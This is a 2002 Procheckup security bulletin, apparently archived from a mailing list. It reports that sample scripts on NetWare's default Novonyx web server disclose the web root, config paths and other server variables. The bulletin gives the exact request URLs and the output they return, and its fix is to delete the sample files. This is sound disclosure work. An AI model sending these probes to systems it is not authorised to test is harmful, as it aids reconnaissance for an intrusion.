('binary' encoding is not supported, stored as-is) Procheckup Ltd www.procheckup.com Procheckup Security Bulletin PR02-1 Description: Netware default programs displays server variables including web root location Date: 8/1/2002 Application: Netware enterprise web server Platform: Novell NetWare 5.0 Severity: Remote attackers can discover the location of the webroot. Authors: Richard Brain [richard.brainat_private] Vendor Status: CVE Candidate: Not assigned Reference: www.procheckup.com/security_info/vuln.html Description: NetWare 5.1 installed with default settings, installs with the Novonyx webserver. This webserver resides on port 80 and comes with sample files which disclose information 1) Requesting the following url :- http://webserver/lcgi/sewse.nlm? sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse The following information is returned:- Here are the ScriptEase:WSE input values _argv[-1] = "SEWSE" _argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE" Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc Here are the cgi.getVar() values Here are the Clib.getenv() values HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm HTTP_ACCEPT_LANGUAGE=en-gb HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461) HTTP_HOST=192.168.1.109 HTTP_CONNECTION=Keep-Alive HTTP_COOKIE=N2S19P61=963269677 ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config NETSITE_ROOT=/novonyx/suitespot SERVER_NAMES=lcgi ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is- null Authorization: NS-value-is-null UserDN: NS-value-is- null SERVER_SOFTWARE=Netscape 3.5 for NetWare SERVER_PORT=80 SERVER_NAME=NETWARE.PROCHECKUP.COM SERVER_URL=http://192.168.1.109 REMOTE_HOST=192.168.1.250 REMOTE_ADDR=192.168.1.250 HTTPS=OFF GATEWAY_INTERFACE=LCGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET SCRIPT_NAME=/lcgi/sewse.nlm QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield .jse NS_SESSION=-751448704 NS_REQUEST=-695399320 FN=lcgi_map_init PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ ========================================================== 2) ALSO Requesting the following url :- http://192.168.1.109/lcgi/sewse.nlm? sys:/novonyx/suitespot/docs/sewse/misc/test.jse The following information is returned:- SERVER_SOFTWARE=Netscape 3.5 for NetWare SERVER_PORT=80 SERVER_NAME=NETWARE.PROCHECKUP.COM SERVER_URL=http://192.168.1.109 REMOTE_HOST=192.168.1.250 REMOTE_ADDR=192.168.1.250 HTTPS=OFF GATEWAY_INTERFACE=LCGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET SCRIPT_NAME=/lcgi/sewse.nlm QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse NS_SESSION=-798892160 NS_REQUEST=-800372600 FN=lcgi_map_init PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ http://192.168.1.109 3) ALSO Requests the following url :- http://webserver/perl/samples/env.pl The following information is returned:- HSERVER_SOFTWARE Netscape 3.5 for NetWare GATEWAY_INTERFACE LCGI/1.1 NS_SESSION -707141760 REMOTE_ADDR 192.168.1.250 SERVER_PROTOCOL HTTP/1.1 NS_REQUEST -695399320 PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl REQUEST_METHOD GET REMOTE_HOST 192.168.1.250 SERVER_URL http://192.168.1.109 SERVER_NAMES perl HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461) HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* HTTP_CONNECTION Keep-Alive HTTP_ACCEPT_LANGUAGE en-gb HTTPS OFF CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/ FN lcgi_map_init SCRIPT_NAME /perl HTTP_ACCEPT_ENCODING gzip, deflate ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config PERL_ROOT SYS:novonyx/suitespot/docs/perlroot SERVER_NAME NETWARE.PROCHECKUP.COM PATH_INFO /samples/env.pl HTTP_COOKIE N2S19P61=963269677 SERVER_PORT 80 ADMSERV_PWD User: NS-value-is-null Password: NS-value-is- null Authorization: NS-value-is-null UserDN: NS-value-is- null HTTP_HOST 192.168.1.109 PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl NETSITE_ROOT /novonyx/suitespot Solution: Delete all default example programs if not needed. Legal: Copyright 2002 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
This archive was generated by hypermail 2b30 : Wed May 29 2002 - 16:29:09 PDT